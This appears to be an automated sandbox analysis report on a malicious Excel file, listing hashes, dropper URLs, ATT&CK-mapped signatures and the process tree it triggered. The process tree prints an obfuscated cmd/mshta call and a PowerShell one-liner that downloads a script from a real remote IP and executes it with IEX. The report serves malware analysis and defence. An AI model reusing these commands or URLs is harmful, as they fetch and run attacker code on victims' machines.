815d6dc3598d029eb56138acb6978353dea267dde13af9358843bab74f9791d3

General

Target

6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
Size

71KB
MD5

21fc12ef8a4a4ba5b38a303fa7e70c08
SHA1

5700a2231371b289eae19ce62e1a73457ee582c4
SHA256

6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5
SHA512

8200f14c0a8023bb74b39796f7859258ef67a21a5f81704f82315695409795fe724ac8ca81513a95d50d169c824532e43865846ce42b0e541366309ace849654

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://185.7.214.7/fer/fe2.png

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	640	1712	cmd.exe	52

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1712	EXCEL.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1712
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
  2⤵
  - Process spawned unexpected child process
  PID:640
- - C:\Windows\system32\mshta.exe
    mshta http://0xb907d607/fer/fe2.html
    3⤵
    PID:1444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
      4⤵
      PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
1⤵
PID:988

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe c7478d2c8179fb54652ba45d95c40fb6 08cCZFKGN0O6kKJONbrDCA.0.1.0.0.0
1⤵
PID:1376

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 424 -p 1444 -ip 1444
1⤵
PID:2056

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1712-130-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1712-131-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1712-132-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1712-133-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1712-134-0x00007FF7D3910000-0x00007FF7D3920000-memory.dmp

Filesize
64KB

Download
memory/1712-137-0x00007FF7D13B0000-0x00007FF7D13C0000-memory.dmp

Filesize
64KB

Download
memory/1712-138-0x00007FF7D13B0000-0x00007FF7D13C0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads